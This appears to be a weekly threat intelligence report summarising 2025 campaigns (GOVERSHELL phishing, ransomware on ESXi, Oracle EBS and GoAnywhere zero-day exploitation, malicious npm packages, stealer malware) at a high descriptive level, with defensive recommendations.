Executive Summary

The cyber threat landscape in 2025 was characterized by complex and sophisticated attacks using various attack vectors and technologies. During this period, numerous cyber threat actors conducted phishing campaigns targeting organizations in North America, Asia, and Europe. They disguised themselves as trustworthy individuals from non-existent organizations and sent phishing emails using various languages and personas. These emails were linked to malicious payloads hosted on cloud services or the attackers' servers. Notably, the malware known as 'GOVERSHELL' maintained remote command execution and persistence through DLL hijacking, and it is suspected that actors with interests related to China developed phishing emails and malware using LLM (Large Language Models) technology. Additionally, in August 2025, a complex ransomware attack targeted an organization's IT infrastructure, affecting VMware ESXi virtual machines and Windows servers. This attack primarily used ransomware variants such as Warlock, LockBit, and Babuk. The attackers utilized open-source tools like Velociraptor to maintain persistent access and modified Active Directory Group Policy Objects to disable real-time protection features. Specifically, Babuk ransomware was used to perform partial encryption on ESXi servers. These attacks appeared to leverage existing techniques and tools, showing similarities with certain threat groups. A large-scale vulnerability exploitation campaign targeting Oracle E-Business Suite was also identified. This campaign exploited the CVE-2025–61882 zero-day vulnerability, enabling authentication bypass and remote code execution. The vulnerability allowed attackers to bypass authentication and exploit the Oracle XML Publisher Template Manager feature to upload malicious templates. Oracle disclosed this vulnerability on October 4, 2025, and subsequently, attackers deployed web shells to maintain persistent access. The disclosure of this vulnerability facilitated opportunistic exploitation, and it appears that multiple attackers leveraged this vulnerability. Moreover, there were numerous other attacks, including the Akira ransomware campaign targeting SonicWall SSL VPN devices, the Astaroth malware campaign targeting digital banking users, and attacks by emerging threat groups targeting AWS cloud environments. These attacks commonly utilized advanced social engineering techniques, aimed at data theft and financial gain, and employed open-source and commercial tools, complex payload deployments, and various techniques to maintain persistent access. These diverse cyber threat incidents demonstrate how complex and multi-layered the modern cybersecurity environment is. Attackers continue to develop new techniques and tools in line with technological advancements, and organizations must strengthen continuous security monitoring and defense strategies in response. Special attention is required for attack vectors such as phishing, ransomware, and zero-day vulnerability exploitation, and it is crucial to prepare countermeasures against the misuse of new technologies like LLM. The "Contagious Interview" campaign by SectorA Group directly targeted developers and the Web3 ecosystem, compromising the trust chain of open-source package registries. Since July 2025, over 338 malicious npm packages have been released, downloaded more than 50,000 times, with some still remaining active. The attackers used typo-squatting packages and obfuscation techniques to create a two-stage compromise chain leading to the BeaverTail loader and InvisibleFerret backdoor. They lured developers with fake recruitment tasks on platforms like LinkedIn, gaining direct access to endpoints and designing the packages to automatically execute malicious payloads upon installation. This behavior indicates that the compromise of individual developer endpoints can immediately translate into a breach of the entire software supply chain's integrity. The attackers operated over 180 fake personas and multiple C2 endpoints, mixing in legitimate hosting to evade detection. Therefore, priority should be given to registry monitoring, package integrity checks, development environment isolation, and strengthening the security of CI/CD pipelines. Analyzing the cyber-attack events of the SectorB group reveals that this group targets organizations in various regions using sophisticated and multifaceted attack techniques. They primarily select their targets through spear-phishing campaigns, disguising themselves as trustworthy individuals and using the names of non-existent organizations to craft phishing emails in multiple languages. Notably, they employ a "relationship-building phishing" technique to reassure the target after initial contact, engage them in conversation, and then deliver malicious links. These phishing emails typically lead to malicious payloads hosted on cloud services or the attacker's server. The malware used is GOVERSHELL, distributed by including a seemingly legitimate executable file within ZIP or RAR compressed files, and executed through DLL hijacking techniques. GOVERSHELL utilizes scheduled tasks for remote command execution and maintaining persistence, and has evolved into five variants. Based on technical indicators and campaign characteristics, it appears that this group has utilized large language models (LLMs) for crafting and phishing emails and developing malware. The illogical content and abnormal details of the emails support this. Additionally, in August 2025, they targeted the IT infrastructure of specific organizations through a complex ransomware attack, deploying various ransomware variants such as Warlock, LockBit, and Babuk. This attack primarily affected VMware ESXi virtual machines and Windows servers, using the open-source tool Velociraptor to maintain persistent access. By exploiting privilege escalation vulnerabilities in older versions of Velociraptor, they executed commands and potentially created communication tunnels. Fileless PowerShell scripts were used to perform mass encryption on Windows systems, and Active Directory Group Policy Objects were modified to disable real-time protection features. Babuk ransomware was used for partial encryption on ESXi servers. PowerShell scripts were used for data exfiltration, with $ProgressPreference set to 'SilentlyContinue' to avoid detection. These attack techniques bear similarities to the tactics of previously known specific threat groups, suggesting a moderate level of relatedness. The attack activities of the SectorB group are characterized by a high level of sophistication in TTPs (tactics, techniques, and procedures) and reflect the latest technological trends. The espionage operation targeting the Middle East conducted by SectorD Group is noteworthy as a case combining technical proficiency and strategic objectives. This operation aimed for long-term persistence and large-scale information gathering by incorporating the exploitation of CVE-2024–1709, DNS manipulation of routers, custom remote access tools, EDR evasion, supply chain pivoting, and complex phishing infrastructure. Leaked internal documents (in Persian) detail the organizational structure and operational techniques, demonstrating the sophistication of the operation, with targets spanning national and social infrastructure, including government, legal, academic, aviation, energy, and finance sectors. This case highlights the need for policy and governance responses beyond simple technical defenses, such as verifying infrastructure integrity, checking the configuration of network boundary devices, continuous monitoring of router and DNS settings, and evaluating supply chain reliability. Additionally, due to the nature of espionage-type attacks, a comprehensive incident response plan, including diplomatic and legal responses, should be implemented concurrently. Examining recent cyber-attack cases by the SectorJ group reveals that they primarily achieve their objectives through advanced techniques and various tactics, techniques, and procedures (TTPs). In the first case, they targeted data exfiltration by exploiting a new zero-day vulnerability (CVE-2025–61882) in Oracle E-Business Suite. This attack involved bypassing authentication via an unauthenticated remote code execution vulnerability using HTTP POST requests, uploading a malicious template, and executing code through Oracle's XML Publisher Template Manager. A notable feature is the deployment of a web shell to maintain persistent access, with a PoC exploit circulated on Telegram suggesting the involvement of multiple threat actors. The second case involved a phishing campaign targeting Germany, where a malicious SVG file was used to download a reverse shell malware called StarFish, securing persistent access and distributing additional payloads. This attack increased email credibility by reusing stolen legitimate emails to pass SPF checks. StarFish set up persistent registry access and deployed a credential-stealing malware called Strela Stealer, showcasing technological advancement beyond simple credential theft. In the third case, an attack exploiting a critical deserialization vulnerability (CVE-2025–10035) in GoAnywhere MFT was observed. This vulnerability allows arbitrary deserialization through a forged license response signature, leading to command injection and remote code execution. A cybercrime group known for Medusa ransomware exploited this vulnerability, posing a significant threat to internet-exposed instances as the attack can occur without authentication. The attackers used RMM tools like SimpleHelp and MeshAgent to maintain persistence and established secure C2 communication via Cloudflare tunnels. During the data exfiltration phase, Rclone was used, and Medusa ransomware was deployed in at least one environment. These multi-stage tactics demonstrate an approach involving zero-day vulnerability exploitation, persistence through RMM tools, and attack expansion through system discovery and lateral movement. The hacking activities of the SectorJ group illustrate their sophistication through continuous vulnerability exploration, rapid malware deployment, and diverse approaches.

Key Characteristics of This Week's Cyber Threats

Recent cyber-attacks have utilized a wide variety of Malware and attack vectors, showing a trend of combining multiple attack techniques. Notably, the Malware used in these incidents include GOVERSHELL, Babuk ransomware, Chaos-C++, Astaroth, AdaptixC2, and Shuyal Stealer. Each of these Malware has its own characteristics and infiltrates victims' systems in various ways to steal information. GOVERSHELL is distributed through spear phishing and executes Malware using DLL hijacking techniques via seemingly legitimate executable files hidden in ZIP or RAR files. This Malware maintains persistence by utilizing scheduled tasks and enables remote command execution. It is suspected to be linked to threat actors associated with China and appears to have used large language models (LLMs) to craft phishing emails and Malware. Babuk ransomware primarily targets VMware ESXi virtual machines and Windows servers, maintaining persistent access through an open-source tool called Velociraptor. It attempts privilege escalation by exploiting vulnerabilities in Velociraptor and performs mass encryption on Windows systems using PowerShell scripts. Chaos-C++ is ransomware redeveloped from a previous .NET version to C++, targeting Microsoft Windows systems. This ransomware hijacks the clipboard to intercept cryptocurrency transactions through encryption and deployment. Additionally, Chaos-C++ makes recovery difficult by deleting large files. Astaroth targets digital banking users in South America, particularly Brazil, and is distributed via phishing emails. This Malware uses GitHub as a hosting platform for its configuration files and updates its command and control (C2) configuration using steganography. AdaptixC2 is a modular open-source C2 framework that supports command execution, file transfer, process injection, and information gathering. This framework primarily uses HTTP and HTTPS for communication and enables lateral movement using SMB and TCP. Shuyal Stealer targets 19 web browsers to steal sensitive data and uses PowerShell scripts to evade system detection. This Malware transmits data via Telegram bots and deletes evidence to make detection difficult. Attack vectors included spear phishing, vulnerability exploitation, malicious email attachments, web shell deployment, and authentication bypass. Notably, the CVE-2025–61882 vulnerability in Oracle E-Business Suite was exploited in a multi-stage attack chain to bypass authentication and execute code, leading to data theft and system compromise. Additionally, attacks targeting SonicWall SSL VPN devices leveraged public vulnerabilities and misconfigurations to gain initial access and deploy ransomware. These attacks demonstrated attempts to bypass defense systems by mixing various attack techniques and technologies. By using different Malware and attack vectors, they complicate detection and defense, particularly by combining phishing techniques and social engineering to easily deceive users. These attacks highlight the need for organizations to strengthen their security systems and respond through continuous monitoring and updates.

Key Takeaways from This Week's Cyber Threat Landscape

The key trends in threats observed this week include AI-based automation, the commercial proliferation of zero-day exploits, and the spread of multi-layered infiltration structures due to the misuse of legitimate tools. As seen in the GOVERSHELL campaign, the sophistication of social engineering has significantly improved by using large language models (LLMs) to automatically generate multilingual phishing messages and lures. This use of AI contributes to the naturalness of phishing content and the creation of customized personas, designed to evade traditional rule-based detection. Therefore, phishing defenses need to shift from static signature detection to behavior-based and context analysis-focused approaches. Simultaneously, as seen in the case of CVE-2025–61882 in Oracle E-Business Suite, zero-day vulnerabilities are being widely exploited in a short period by various threat groups, and the trend of 'Exploit-as-a-Service' is strengthening. Attackers exploited the XML Publisher Template Manager to upload malicious templates, deploy web shells, and construct a consistent attack chain leading to data theft and extortion. This incident suggests that rapid threat intelligence sharing, patch management, and automated monitoring of core application layers are essential in response to zero-day threats. Attacks targeting cloud and virtualization environments continue to emerge, demonstrating that attackers are actively utilizing legitimate management and operational tools for persistence after infiltration. Examples include the exploitation of vulnerabilities in older versions of Velociraptor (CVE-2025–6264), theft of AWS IAM keys and abuse of excessive permissions, and partial encryption targeting ESXi environments. Attackers make detection difficult by converting legitimate services and tools like Rclone, AnyDesk, and Cloudflare Tunnel into C2, data exfiltration, and lateral movement paths. Consequently, cloud security should be operated not as simple perimeter defense but as a combination of privilege minimization, key and credential lifecycle management, and abnormal behavior detection. The ransomware ecosystem is undergoing modularization, variant diversification, and franchising, with various variants such as Chaos-C++, Warlock, LockBit, Babuk, and Direwolf consistently employing double extortion tactics. Some variants have increased recovery difficulty by switching programming languages (e.g., .NET → C++) or introducing unique encryption and file handling logic. Operators attempt prolonged internal occupation after initial access using legitimate tools. Concurrently, the misuse of public package repositories like npm, PyPI, and RubyGems, and the use of legitimate platforms like Discord, Telegram, and GitHub for C2 and data exfiltration techniques directly threaten the supply chain and developer trust chain. Therefore, software supply chain security should be strengthened through developer education, package integrity verification, registry monitoring, and external dependency inspection systems. Phishing and social engineering have become more sophisticated with trust-building techniques using realistic UIs, such as brand impersonation, disguising as recruitment processes, and mimicking CAPTCHA and Glassdoor pages. Additionally, there are attempts to evade detection using unconventional file formats like SVG, LNK, and ZIP. Information-stealing malware (such as Shuyal, Stealit, Astaroth, etc.) comprehensively collects browser data, clipboard contents, screenshots, and cryptocurrency wallet information, operating automated exfiltration pipelines through Telegram, Discord, and GitHub. As a result, the likelihood of forensic trace deletion, evidence concealment, and reinfection has increased, necessitating a redesign of detection and response strategies to focus on more in-depth log collection and correlation analysis. In summary, this week's threats indicate that the technical sophistication and automation are advancing simultaneously, accelerating the industrialization of the attacker ecosystem. From a defense perspective, it is urgent to secure capabilities for detecting LLM abuse, automate monitoring of zero-day and exploit distribution, ensure thorough cloud IAM and key management, strengthen software supply chain integrity policies, and introduce AI and behavior-based phishing detection models. Beyond short-term event responses, there is a need for a shift towards organizational-level security governance, integration of threat intelligence, and a proactive detection and behavior analysis system.